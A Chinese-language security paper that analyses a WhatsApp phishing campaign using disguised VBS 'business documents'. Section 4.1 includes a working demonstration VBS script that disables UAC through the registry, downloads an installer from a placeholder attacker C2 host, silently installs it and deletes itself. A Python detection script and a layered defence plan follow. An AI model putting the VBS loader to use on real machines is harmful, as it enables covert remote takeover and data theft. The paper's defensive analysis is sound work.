四层纵深闭环防御架构才能实现事前拦截、事中阻断、事后溯源全链路风险管控。本文结合全球多厂商同步监测的攻击样本数据厘清该类攻击的传播特征、技术缺陷提出可落地的运维、管控、应急处置方案为跨境商贸企业、政企办公终端防范即时通讯类新型钓鱼入侵提供完整技术参考与学术支撑。关键词WhatsApp 钓鱼虚假商务文档VBS 恶意脚本UAC 绕过远程控制社交信任链终端纵深防御1 引言1.1 研究背景跨境贸易、跨国商务沟通场景下WhatsApp 凭借端到端加密、多终端同步、多语言适配特性成为主流即时通讯工具大量企业通过该平台传输发票、结算单、项目合同等敏感商务文件。区别于传统邮件渠道WhatsApp 依托熟人通讯录构建天然信任传播链路攻击者利用劫持后的真实账号分发附件大幅降低用户社会工程防范心理。2026 年 6 月 Security Boulevard 发布专题报道《WhatsApp phishing attack uses fake business documents to hack PCs》同步引用卡巴斯基全域威胁遥测数据完整披露一套规模化跨境钓鱼攻击活动。该攻击区别于单一链接窃取账号的传统钓鱼模式以伪装商业单据的 VBS 脚本为核心载荷不依赖高危系统漏洞仅依靠 Windows 原生脚本宿主、注册表修改机制完成权限提升滥用厂商数字签名白名单终端管理软件实现无特征远程控制攻击覆盖巴西、印度、西班牙、澳大利亚、越南、马来西亚等全球多区域市场。报道明确两点关键客观事实其一当前安全厂商尚未定位攻击者劫持 WhatsApp 账号的精准技术路径账号劫持手段具备隐蔽、可复制特征同类攻击可长期持续迭代其二WhatsApp 网页端、桌面客户端文件传输机制存在天然风险漏洞桌面端可直接双击执行 VBS 脚本网页端仅需简单下载即可触发恶意代码运行移动端无执行条件攻击精准定向 Windows 办公终端。当前全球大量中小外贸企业、跨境办事处未针对 WhatsApp 文件传输建立专项安全管控策略边界网关受端到端加密限制无法解析平台内附件内容终端安全仅依靠静态特征查杀难以识别 “合法软件恶意滥用” 行为导致本次攻击在短时间内形成跨区域扩散大量企业办公终端被攻击者完全接管商业机密、财务数据面临泄露风险。1.2 现有安全防护体系核心短板结合 Security Boulevard 报道披露的攻击细节与同期微软、卡巴斯基同步预警信息当前政企通用安全架构针对本次虚假商务文档钓鱼攻击存在四层系统性短板第一加密社交平台风控缺失熟人批量分发识别逻辑。现有平台风控仅拦截陌生账号群发垃圾消息对已劫持的存量正常账号向通讯录批量推送脚本类附件无异常告警机制附件后缀、文件类型、发送频次未纳入账号行为基线判断第二网络边界安全设备无法穿透加密流量检测载荷。WhatsApp 全量消息与附件采用端到端加密传输企业防火墙、邮件网关、流量审计设备无法解析文件内容恶意 VBS 脚本可无阻碍直达终端风险全部后置至终端侧第三Windows 终端对脚本执行、UAC 篡改行为缺乏动态监控。多数企业终端仅关闭 Office 宏防护未限制 Windows Script Host 运行权限EDR 工具未持续监控注册表 UAC 关键项写入操作脚本可静默关闭权限校验第四商用运维软件无安装准入与外联管控。ManageEngine 等正规 UEM 工具自带厂商数字签名杀毒软件默认白名单放行企业未建立运维软件统一部署规范无法识别终端静默私自安装行为也未监控程序外联境外陌生管控服务器的加密长连接。反网络钓鱼技术专家芦笛强调传统网络安全长期割裂 “社交传播入口” 与 “终端执行出口”邮件安全、边界流量、终端杀毒独立运行、数据不互通无法形成从消息分发到代码执行的全链路联动风控是本次虚假商务文档钓鱼实现大范围跨国扩散的核心底层原因。1.3 研究内容与实践价值本文以 Security Boulevard 2026 年 6 月专项报道为核心基础素材结合卡巴斯基、微软同步发布的威胁情报完成五项核心研究工作一是完整还原虚假商务文档 WhatsApp 钓鱼标准化攻击闭环分层拆解账号劫持、熟人链式传播、本地化诱饵伪装、双 VBS 脚本权限绕过、合法 UEM 远程控制五大阶段技术特征二是深度解析 VBS 脚本修改注册表关闭 UAC、静默部署远程管理工具的底层实现逻辑厘清合法软件规避静态查杀的技术原理三是编写复刻攻击核心逻辑的演示 VBS 代码配套面向企业运维的 Python 终端风险自动检测脚本复现风险识别流程四是对比传统邮件钓鱼与加密 IM 熟人链路钓鱼在欺骗性、穿透性、隐蔽性层面的差异量化新型攻击防御难度五是构建四层协同纵深防御体系覆盖平台侧事前拦截、终端侧事中阻断、企业管理兜底加固、用户安全意识长效防护配套标准化应急处置流程。理论层面本文补充加密即时通讯平台熟人信任链钓鱼的标准化攻击模型完善 “合法商用软件恶意滥用” 细分安全研究维度工程实践层面文中代码、检测规则、分层防护方案可直接用于外贸企业终端安全运维、社交平台风控规则迭代填补跨境商务场景 WhatsApp 文档类钓鱼的标准化防护空白降低企业终端被远程劫持、核心商业数据泄露的安全损失。1.4 论文整体结构安排全文共分为七大主体章节第 1 章为引言阐述研究背景、现有防护短板、研究价值与文章结构第 2 章完整还原 Security Boulevard 报道披露的虚假商务文档钓鱼攻击全链路拆解各阶段技术手段与全局传播特征第 3 章针对核心恶意 VBS 载荷、UAC 绕过机制、ManageEngine 远程控制逻辑开展底层技术解析第 4 章提供完整可运行代码示例包含恶意脚本功能复现代码、企业终端批量风险检测 Python 脚本第 5 章对比传统邮件钓鱼与 WhatsApp 熟人社交钓鱼的攻防差异量化新型攻击的扩散优势第 6 章搭建面向该类攻击的多层级协同防御体系从平台、终端、企业管理、用户认知四个维度落地可执行防护策略第 7 章为结论总结全文研究结论预判同类钓鱼攻击未来迭代方向提出长期安全治理思路。2 Security Boulevard 报道披露的 WhatsApp 虚假商务文档钓鱼攻击全链路与全局特征Security Boulevard 专题报道整合多厂商受害样本、受害者反馈、威胁样本逆向分析数据完整还原本次全球化钓鱼攻击标准化闭环流程整体分为账号劫持、熟人通讯录链式分发、本地化虚假商务文档投递、双 VBS 脚本系统权限篡改、正规 UEM 工具持久远程控制五个递进阶段各环节相互配合最大化利用社交信任与 Windows 原生安全机制规避安全设备检测。2.1 第一阶段WhatsApp 存量合法账号劫持攻击源头报道明确标注安全厂商完成大量受害样本复盘后仍无法确定攻击者劫持 WhatsApp 账号的精确技术手段结合同期行业同类攻击事件存在三类高概率劫持路径均具备低门槛、易复制特点AiTM 验证码中间人钓鱼攻击者搭建高仿 WhatsApp 网页登录页面诱导目标用户输入登录短信验证码完成陌生设备会话绑定后台接管完整账号权限SIM 卡交换社工攻击伪造用户身份材料向运营商补办手机号拦截 WhatsApp 登录、设备绑定验证码实现无交互账号劫持前置社交信息搜集社工渗透通过企业官网、领英、社交平台获取用户姓名、企业、手机号等信息伪装平台客服诱导用户主动完成设备配对授权。无论采用何种劫持手段攻击者获取账号完整操作权限后可读取全部通讯录、调取历史商务聊天记录、自由发送文字、图片、各类格式附件。对比全新注册空白账号被劫持的存量活跃账号具备真实社交信用消息推送不会触发平台基础垃圾消息拦截规则是实现跨国大范围扩散的基础前提。2.2 第二阶段熟人通讯录链式蠕虫式传播信任滥用核心环节账号劫持完成后攻击者自动遍历通讯录全部联系人批量推送钓鱼消息话术完全贴合跨境商务沟通场景主流诱饵文案包含月度财务对账附件、跨境合作报价单、海关发票凭证、项目结算单据、物流对账明细等匹配外贸企业员工日常业务沟通场景大幅降低用户心理戒备。该传播模式具备蠕虫式指数扩散特征单一被劫持账号可一次性触达数十至数百名商务联系人若任意联系人执行恶意 VBS 文件终端被完全控制后攻击者可再次劫持该用户 WhatsApp 账号向另一批全新通讯录联系人推送虚假商务文档形成跨圈层、跨国家链式扩散。Security Boulevard 统计显示正是依托熟人信任传播机制本次攻击在两周内覆盖南美、东南亚、欧洲、大洋洲十余国家与地区传统陌生账号批量群发钓鱼无法实现同等传播规模。反网络钓鱼技术专家芦笛指出社交信任是加密 IM 钓鱼最核心的攻击红利普通企业员工对通讯录商务联系人发送的财务、合同类文件几乎无甄别意识而当前 WhatsApp 平台风控未针对 “劫持账号短时间内向通讯录批量推送 VBS、JS 脚本附件” 设置风险拦截规则导致恶意载荷可无阻碍送达全球终端。2.3 第三阶段多语言本地化虚假商务文档载荷投递诱饵伪装技术为适配全球多区域受害群体攻击者对恶意 VBS 脚本文件名进行本地化语言改造针对巴西使用葡萄牙语、西班牙使用西班牙语、印度使用印地语、中英区域配套中英文财务单据命名同时隐藏脚本后缀视觉上模拟 PDF、Excel、Word 标准商业文档格式普通用户仅依靠文件名无法识别可执行脚本属性。报道区分两种终端下文件执行差异进一步降低用户操作门槛Windows 桌面客户端接收 VBS 附件后可直接双击运行依托 Windows Script Host 原生组件执行全部脚本代码无需额外下载保存WhatsApp 网页端附件需先下载至本地系统文件夹双击文件后同样触发脚本完整执行流程移动端安卓、iOS 设备无 VBS 脚本运行环境攻击者定向筛选长期使用 Windows 办公电脑的外贸从业者作为核心攻击目标精准锁定高价值办公终端。从用户识别角度商务场景下接收合作方单据属于常规业务行为用户普遍忽略文件后缀隐藏、脚本伪装风险为后续系统权限篡改、远程持久控制提供关键执行入口。2.4 第四阶段双 VBS 脚本联动篡改 Windows UAC 安全策略权限绕过核心攻击动作用户双击伪装商务文档后系统自动串行执行两段联动 VBS 脚本两段脚本分工清晰、执行顺序不可逆层层瓦解 Windows 终端原生权限防护机制第一段前置脚本核心功能修改系统注册表核心安全项临时关闭 Windows UAC 用户账户控制机制。UAC 是 Windows 原生权限校验机制正常情况下修改系统注册表、安装系统级软件必须弹出管理员授权确认窗口脚本依托 WMI 注册表操作接口静默改写参数跳过全部弹窗交互实现无交互权限篡改。第二段后置部署脚本核心功能建立后台加密网络连接从攻击者境外 C2 服务器拉取 ManageEngine Endpoint Central 客户端离线安装包调用系统静默安装参数完成后台部署同步修改 Windows 系统服务项设置程序开机自动启动配置客户端外联攻击者自建管控服务器地址。两段脚本全程以无窗口静默模式运行执行过程无命令行黑框、无弹窗提示用户仅短暂看到双击文件无响应无法感知后台系统策略篡改、运维软件静默安装等高危操作。2.5 第五阶段合法 UEM 运维软件实现持久无感知远程控制隐蔽后门载体Security Boulevard 报道重点强调本次攻击区别于传统木马的核心特征攻击者放弃自定义恶意后门程序选用正规商用统一终端管理平台 ManageEngine Endpoint Central 作为远程控制载体。该软件原生设计用于企业 IT 运维人员远程管控办公电脑、服务器官方原生功能包含远程桌面、文件读写、进程管控、屏幕录制、键盘记录、系统配置修改等完整终端控制权限。攻击者利用软件合法运维能力无需开发自定义恶意代码仅通过静默安装客户端即可将受控终端接入攻击者自建管理控制台全程实现持久无感知远程操控。该手段具备极强静态查杀规避能力主流杀毒软件病毒库将 ManageEngine 标记为良性运维软件附带厂商正规数字签名静态文件特征扫描无法识别恶意使用行为仅依靠动态外联行为分析才能发现程序连接境外陌生管控服务器的异常风险。终端被攻陷后攻击者可完成全部高危操作窃取本地财务报表、客户合同、企业核心商业机密植入勒索、窃密附加恶意程序篡改业务软件配置利用受控终端横向渗透企业内网对中小型外贸企业造成持续性数据泄露与财产损失风险。2.6 本次虚假商务文档钓鱼区别于传统钓鱼的四大独有特征综合 Security Boulevard 报道与配套威胁情报该 WhatsApp VBS 钓鱼具备四项独有特征也是传统安全防护体系大面积失效的核心诱因传播渠道信任化依托熟人通讯录链式传播发送方为可信商务联系人大幅降低用户社会工程防范阈值载荷载体合法化以正规商用 UEM 运维软件作为远程控制后门规避杀毒软件静态特征检测系统突破轻量化仅依靠两段简易 VBS 脚本完成 UAC 绕过不依赖系统高危漏洞适配全版本 Windows 操作系统覆盖范围全球化本地化多语言诱饵适配全球多区域市场无单一地域限制跨境商贸群体为核心受害目标。3 恶意 VBS 脚本与 ManageEngine 远程控制底层技术原理解析3.1 Windows UAC 机制与脚本静默绕过底层逻辑Windows 用户账户控制UAC通过区分标准用户、管理员两级操作权限拦截未授权程序修改系统核心配置系统默认配置下修改注册表、安装系统级软件必须弹出管理员授权确认窗口。UAC 核心控制参数存储于注册表路径HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System其中EnableLUA注册表项控制 UAC 总开关数值 1 代表开启防护数值 0 代表完全关闭权限校验配套参数ConsentPromptBehaviorAdmin控制管理员授权弹窗交互模式设置为 0 时直接静默放行所有权限修改请求。恶意 VBS 脚本依托 Windows 内置 WMI 注册表操作接口无需任何弹窗交互直接改写上述两项注册表参数双重策略叠加实现完整 UAC 绕过。该绕过方式不依赖系统高危漏洞仅利用 Windows 脚本宿主原生注册表操作权限只要终端登录账户具备本地管理员权限即可完全生效覆盖绝大多数外贸企业办公 Windows 设备。3.2 双 VBS 脚本串行联动完整执行流程攻击者封装的虚假商务文档内部嵌套两段串行执行 VBS 代码执行流程不可逆两段脚本分工明确前置策略修改脚本读取本地注册表 UAC 原始配置写入关闭防护参数调用系统命令刷新组策略使修改即时生效脚本执行全程隐藏 WScript 可视化窗口无任何用户交互提示后置载荷部署脚本建立后台 HTTP 网络连接从攻击者境外 C2 服务器拉取 ManageEngine 客户端离线安装压缩包调用系统静默安装参数完成后台部署修改 Windows 服务注册表项实现开机自动启动同步改写客户端配置文件强制程序外联攻击者管控服务器地址。两段脚本全部后台静默运行普通办公用户无法通过桌面弹窗、前台进程感知恶意操作隐蔽性远高于传统 exe 木马程序。3.3 ManageEngine Endpoint Central 恶意滥用技术逻辑ManageEngine 产品原生定位为企业内部 IT 运维工具客户端与管理控制台采用私有加密长连接通信客户端主动发起外联请求无需端口映射即可实现公网远程控制该原生通信机制被攻击者恶意滥用形成三重隐蔽优势静默安装无审计痕迹官方安装程序提供完整静默部署参数可跳过许可协议、安装路径选择、桌面快捷方式创建后台自动完成系统服务注册加密流量规避网关审计客户端与控制台通信采用私有加密协议企业边界网关流量审计设备无法解析通信内容仅能识别未知加密外联流量难以判定为恶意行为全权限终端操控能力运维原生功能覆盖远程桌面、文件上传下载、进程终止、系统命令执行、实时屏幕截图完全覆盖攻击者窃密、破坏、内网渗透全部需求正规数字签名规避静态查杀软件附带厂商官方数字签名主流杀毒软件默认收录至白名单静态文件扫描不会拦截程序仅动态行为监测可识别外联陌生境外管控服务器的异常风险。反网络钓鱼技术专家芦笛强调合法运维软件滥用是 2026 年钓鱼攻击核心新趋势攻击者逐步放弃高检出率自定义木马转而采用白名单商用工具降低终端拦截概率终端安全防护必须从静态特征查杀全面转向动态外联、用户行为基线监控。4 攻击载荷代码复现与企业终端风险自动化检测脚本示例本节分为两部分提供完整可运行代码第一部分还原恶意 VBS 脚本核心攻击功能仅用于安全研究实验无完整攻击能力复现 UAC 注册表修改、远程下载静默安装运维软件逻辑第二部分提供 Python 终端风险自动化检测脚本自动扫描本地 UAC 开关状态、异常 ManageEngine 后台服务、可疑境外外联管控地址用于外贸企业批量终端风险自查。代码无复杂数学运算适配 Windows 办公终端运行完全贴合 Security Boulevard 报道披露的真实攻击技术实现逻辑。4.1 恶意 VBS 脚本核心功能演示代码安全研究专用vbscript 演示虚假商务文档内恶意VBS脚本UAC绕过静默部署UEM工具核心逻辑仅用于安全分析实验Set WshShell CreateObject(WScript.Shell)Set objNetwork CreateObject(WScript.Network)Dim regUACPath, uacSwitch, promptRule, downloadUrl, savePath 1. 定义UAC注册表核心路径与修改参数regUACPath HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\uacSwitch EnableLUApromptRule ConsentPromptBehaviorAdmin 静默关闭UAC权限校验写入注册表参数WshShell.RegWrite regUACPath uacSwitch, 0, REG_DWORDWshShell.RegWrite regUACPath promptRule, 0, REG_DWORD 后台刷新组策略使UAC配置立即生效隐藏执行窗口WshShell.Run cmd /c gpupdate /force, 0, True 2. 定义攻击者C2服务器ManageEngine安装包地址与本地临时保存路径downloadUrl https://attacker-c2-server.com/agent_setup.zipsavePath WshShell.ExpandEnvironmentStrings(%TEMP%) \uem_agent_install.exe 3. 后台下载终端管理客户端安装包Set xmlHttp CreateObject(MSXML2.XMLHTTP)xmlHttp.Open GET, downloadUrl, FalsexmlHttp.SendIf xmlHttp.Status 200 ThenSet stream CreateObject(ADODB.Stream)stream.Openstream.Type 1stream.Write xmlHttp.responseBodystream.SaveToFile savePath, 2stream.CloseEnd If 4. 静默无交互安装UEM客户端全程无弹窗、无桌面提示WshShell.Run savePath /s /verysilent /norestart, 0, False 5. 脚本执行完成后自删除清除本地执行痕迹规避溯源Set fso CreateObject(Scripting.FileSystemObject)fso.DeleteFile WScript.ScriptFullName, True代码说明该演示脚本完整复刻 Security Boulevard 报道披露的两大核心攻击动作一是修改注册表永久关闭 UAC 权限校验二是远程下载并静默部署 ManageEngine 终端管理程序真实攻击样本会增加多层代码混淆、域名动态切换、反虚拟机检测、反沙箱逻辑规避基础安全软件静态扫描识别。4.2 Windows 企业终端钓鱼风险自动化检测 Python 脚本本脚本面向外贸企业安全运维人员开发自动检测三类核心风险指标UAC 权限校验是否被恶意脚本关闭、系统是否存在异常 ManageEngine 后台服务、程序是否外联境外未知管控服务器输出标准化结构化风险报告支持企业批量终端巡检。# Windows终端WhatsApp虚假商务文档VBS钓鱼风险检测脚本import winregimport subprocessimport osimport reclass TerminalPhishingDetector:def __init__(self):self.risk_report []self.uac_registry_path rSOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Systemdef detect_uac_status(self):# 检测UAC开关状态判定是否被恶意VBS脚本篡改关闭try:reg_key winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, self.uac_registry_path)enable_lua_val winreg.QueryValueEx(reg_key, EnableLUA)[0]admin_prompt_val winreg.QueryValueEx(reg_key, ConsentPromptBehaviorAdmin)[0]winreg.CloseKey(reg_key)if enable_lua_val 0 or admin_prompt_val 0:self.risk_report.append(高危风险UAC用户账户控制已被篡改关闭终端存在脚本权限篡改漏洞)else:self.risk_report.append(安全状态UAC系统防护正常开启无篡改痕迹)except Exception as err:self.risk_report.append(f检测异常无法读取UAC注册表配置{str(err)})def scan_manageengine_system_service(self):# 扫描系统后台是否存在异常ManageEngine运维服务cmd_command sc query | findstr ManageEngineresult subprocess.run(cmd_command, shellTrue, capture_outputTrue, textTrue)if result.stdout.strip():self.risk_report.append(f高危风险检测到异常ManageEngine后台服务进程详情{result.stdout.strip()})else:self.risk_report.append(安全状态未检测到ManageEngine终端管理后台服务)def scan_abnormal_oversea_connection(self):# 筛查终端未知境外加密外联连接匹配UEM客户端外联C2服务器特征cmd_command netstat -ano | findstr ESTABLISHEDresult subprocess.run(cmd_command, shellTrue, capture_outputTrue, textTrue)conn_lines result.stdout.splitlines()foreign_ip_rule re.compile(r\d\.\d\.\d\.\d:\d)risk_connection_list []for line in conn_lines:match_result foreign_ip_rule.search(line)if match_result:ip_addr match_result.group(0).split(:)[0]# 简易内网IP判定逻辑生产环境可接入全球IP归属地址库精准识别境外地址if not ip_addr.startswith((192.168., 10., 172.16., 127.)):risk_connection_list.append(line)if risk_connection_list:self.risk_report.append(f中风险检测多条境外未知加密外联连接疑似受控终端{risk_connection_list})else:self.risk_report.append(安全状态无异常境外服务器外联连接)def output_full_risk_report(self):print( WhatsApp虚假商务文档钓鱼终端风险检测完整报告 )for risk_item in self.risk_report:print(risk_item)if __name__ __main__:detector TerminalPhishingDetector()detector.detect_uac_status()detector.scan_manageengine_system_service()detector.scan_abnormal_oversea_connection()detector.output_full_risk_report()脚本运行效果说明正常合规办公终端仅输出安全状态提示遭受本次虚假商务文档钓鱼攻击的设备会同时命中 UAC 关闭、异常 ManageEngine 服务、境外外联三大高危风险运维人员可依据报告快速隔离受感染终端、卸载恶意部署的运维程序、恢复 UAC 安全策略、溯源通讯录传播链路。反网络钓鱼技术专家芦笛指出该检测脚本可集成至企业 EDR 终端安全工具配置 7×24 小时实时监测任务提前拦截 VBS 脚本篡改系统安全策略的恶意行为。5 熟人社交 IM 钓鱼与传统邮件钓鱼攻防差异对比分析结合 Security Boulevard 报道披露的攻击细节本节从传播信任度、载荷投递通道风控强度、远程控制载体隐蔽性、终端系统突破手段、现有安全体系适配能力五个维度对比传统邮件钓鱼与 WhatsApp 熟人链路虚假商务文档钓鱼的核心差异客观量化新型钓鱼攻击的防御难度提升幅度。5.1 传播信任度与社会工程欺骗阈值差异传统邮件钓鱼发件人多为陌生外部邮箱地址企业员工长期接受邮件安全培训接收陌生财务、合同附件时天然存在戒备心理WhatsApp 钓鱼消息发送方为用户通讯录真实商务联系人跨境贸易场景下接收合作方结算单据属于常规业务行为用户几乎不会怀疑文件安全性社会工程欺骗成功率大幅提升。同时攻击者针对全球不同区域制作本地化多语言诱饵文件名进一步降低文档违和感传统邮件钓鱼仅单一语言模板跨区域传播效果存在明显局限难以实现全球同步扩散。5.2 载荷投递通道风控强度差异企业邮件系统标配专业邮件安全网关具备附件深度沙箱解析、恶意脚本拦截、可疑文件隔离功能VBS、JS 脚本类附件会被网关直接拦截无法送达收件人终端WhatsApp 作为境外第三方加密社交平台企业网络边界网关无法对平台传输文件做深度解析端到端加密机制导致平台侧无法扫描附件内部内容恶意 VBS 脚本可无阻碍直达用户办公终端全部风险后置至终端单点防护。该加密传输特性是 IM 钓鱼核心防护盲区边界安全设备无法介入文件前置检测一旦终端防护失效即造成设备完全沦陷。5.3 远程控制载体隐蔽性差异传统邮件钓鱼多采用独立定制木马、勒索病毒作为后门载体具备明确恶意特征杀毒软件静态特征库可快速识别拦截本次 WhatsApp 虚假商务文档钓鱼使用正规 ManageEngine 商用运维软件附带厂商官方数字签名杀毒软件默认纳入白名单放行仅依靠动态外联行为监测才能识别恶意使用场景终端检测门槛大幅提高。5.4 终端系统突破手段差异传统邮件钓鱼多依赖 Office 文档宏漏洞、系统高危漏洞实现代码执行漏洞存在官方补丁修复方案企业定期更新系统、Office 组件即可大幅降低攻击风险本次攻击不依赖任何系统高危漏洞仅依靠 Windows 原生 VBS 脚本、注册表修改操作全版本 Windows 系统均可被突破无补丁能够彻底根治该攻击路径防护只能依靠终端权限管控、脚本执行限制。5.5 现有安全体系适配能力对比传统邮件钓鱼具备成熟分层防护闭环邮件网关过滤、附件沙箱检测、终端杀毒、员工邮件安全培训完整配套针对熟人 IM 虚假商务文档类钓鱼当前全球外贸企业普遍无标准化防护框架社交平台、边界网关、终端安全工具数据孤岛割裂缺乏全链路联动检测机制防护体系存在大面积空白。综合对比可见依托 WhatsApp 熟人链路的虚假商务文档钓鱼在欺骗性、穿透性、隐蔽性上全面优于传统邮件钓鱼现有传统安全基础设施无法有效覆盖该类新型威胁必须重构适配加密即时通讯场景的多层级纵深防御架构。6 面向 WhatsApp 虚假商务文档钓鱼攻击的四层协同防御体系结合 Security Boulevard 报道披露的攻击全链路技术弱点本文构建四层递进式协同防御体系完整覆盖社交平台传播入口、终端脚本执行、企业组织权限管控、用户安全认知四大维度形成事前拦截、事中阻断、事后溯源处置完整风险闭环。6.1 第一层防御WhatsApp 平台侧账号与消息行为基线监控事前源头拦截防御核心目标在恶意虚假商务文档、VBS 附件送达用户终端前识别劫持账号阻断熟人链式蠕虫传播核心管控规则包含四类账号异常发送行为基线监测针对长期低频率发送附件的存量账号一旦短时间内向通讯录批量推送后缀为 VBS、JS、CMD、LNK 的脚本类文件直接标记高风险临时限制账号文件发送权限推送安全告警至账号绑定手机多设备会话异常管控异地、凌晨陌生设备绑定账号时强制触发两步验证校验无 PIN 码验证直接阻断陌生会话绑定从源头减少账号劫持概率附件风险标签识别弹窗建立脚本类文件风险特征库对伪装成 PDF、Excel、Word 的 VBS 文件弹出强制风险提示弹窗明确告知用户该文件为可执行脚本存在终端远程控制风险劫持账号快速处置机制检测到批量传播恶意脚本附件的账号自动强制下线全部关联登录设备临时冻结消息发送功能推送账号安全重置提醒至绑定手机号。反网络钓鱼技术专家芦笛提出平台侧风控是阻断攻击扩散效率最高的环节通过账号行为基线前置拦截可从源头避免恶意载荷触达企业终端大幅降低政企安全运维处置压力。6.2 第二层防御Windows 终端脚本与 UEM 软件动态行为防护事中执行阻断防御核心目标用户下载恶意 VBS 脚本后阻止脚本执行、UAC 注册表篡改、静默私自安装运维软件配置三项终端标准化管控策略组策略限制 Windows Script Host 脚本执行权限企业办公终端统一配置域组策略禁用普通标准用户运行 VBS、JS 脚本仅管理员授权指定路径脚本可执行彻底切断恶意载荷运行入口EDR 终端工具监控 UAC 注册表写入操作持续监控注册表EnableLUA、ConsentPromptBehaviorAdmin项修改行为一旦检测脚本尝试关闭 UAC 防护立即终止脚本进程并推送高危告警至运维后台商用 UEM 运维软件安装准入管控建立企业内部运维软件统一白名单仅允许 IT 管理员通过企业内网统一渠道部署 ManageEngine 等运维工具拦截终端侧静默私自安装行为实时监测程序外联非企业自有管控服务器的加密长连接并自动阻断。同时将前文提供的终端风险检测脚本纳入 EDR 定时巡检任务实现 7×24 小时自动识别已沦陷终端并自动隔离。6.3 第三层防御企业组织办公流程与终端权限兜底管控针对频繁使用 WhatsApp 传输跨境商务文件的外贸企业配套组织管理规范缩小整体攻击面公私社交账号分离管控禁止员工使用个人 WhatsApp 处理企业财务、合同、客户资料等敏感业务统一部署 WhatsApp Business 商用企业接口企业后台可完整审计全部消息与附件传输记录终端账户权限最小化管控办公电脑统一分配标准用户权限不授予本地管理员权限限制脚本修改系统注册表、安装系统级软件从底层削弱 VBS 脚本权限绕过能力境外通讯流量审计规则企业边界网关完整记录 WhatsApp 客户端全部外联流量针对加密长连接、境外未知服务器通信建立分级告警规则标准化应急处置流程明确终端疑似被远程控制后的完整处置步骤物理断开网络、卸载异常 ManageEngine 服务、恢复 UAC 系统配置、修改全部社交账号登录密码、全终端病毒查杀、溯源通讯录传播链路并全域推送风险预警。6.4 第四层防御员工即时通讯安全认知常态化培训人为风险防线技术防护无法完全规避用户主动双击执行恶意虚假商务文档的风险配套分层安全培训降低社会工程欺骗成功率诱饵识别专项教学重点讲解本地化多语言伪装 VBS 脚本、熟人发送异常财务单据的典型特征明确正规商务单据不会以 VBS 脚本格式传输高危操作禁令普及禁止双击 WhatsApp 接收的未知可执行脚本附件陌生商务文件优先通过企业邮件、内部网盘二次核验发件人身份账号安全操作规范全员强制开启 WhatsApp 两步验证定期查看 Linked Devices 关联设备列表及时登出陌生登录终端风险一键上报机制搭建企业内部可疑消息、附件上报通道安全运维团队快速研判并向全体员工推送全域风险预警阻断链式传播。7 结论本文以 2026 年 6 月 Security Boulevard 发布的《WhatsApp phishing attack uses fake business documents to hack PCs》专项报道为核心实证素材结合卡巴斯基、微软同步披露的全域威胁情报完整还原 “账号劫持 — 熟人通讯录链式传播 — 本地化虚假商务 VBS 载荷投递 — 双脚本联动绕过 UAC 权限校验 — 静默部署 ManageEngine 实现持久远程控制” 标准化攻击闭环系统拆解恶意 VBS 脚本篡改系统安全策略、滥用正规商用终端管理软件规避静态杀毒检测的底层技术逻辑复现核心攻击演示代码并配套企业终端自动化风险检测 Python 脚本从传播信任度、载荷风控、载体隐蔽性、系统突破、体系适配五个维度对比传统邮件钓鱼与加密 IM 熟人链路钓鱼的攻防差异清晰阐明本次攻击大范围跨国扩散的核心诱因。研究证实本次虚假商务文档 WhatsApp 钓鱼能够形成全域传播的三大关键因素一是 WhatsApp 熟人社交信任链大幅降低员工社会工程防范心理二是平台端到端加密导致企业边界网关无法前置扫描附件恶意脚本无阻碍直达终端三是攻击者放弃自定义恶意木马采用厂商白名单运维软件作为远程控制载体突破传统静态特征杀毒防护体系。反网络钓鱼技术专家芦笛强调单一终端杀毒、网络边界防护无法抵御此类复合型加密社交平台钓鱼威胁必须搭建 “平台账号行为监控、终端脚本动态拦截、企业权限流程管控、员工安全认知培训” 四层协同纵深防御体系实现从攻击源头、载荷传输、终端代码执行全链路风险闭环拦截。从攻击长期迭代趋势判断未来同类加密 IM 钓鱼将持续深化两大演化方向一是拓展多语种本地化诱饵模板覆盖全球全部主流贸易市场进一步提升虚假商务文档的伪装迷惑性二是批量滥用各类正规商用远程协作、运维软件作为后门载体持续规避终端静态安全检测机制。后续政企安全防护体系需持续强化动态行为监测、脚本执行权限刚性管控、跨平台风险情报共享能力同步完善跨境商贸场景下即时通讯文件传输安全管理规范平衡商务沟通便捷性与办公终端设备安全防护水平持续压缩熟人链路新型钓鱼攻击的生存与扩散空间。编辑芦笛公共互联网反网络钓鱼工作组
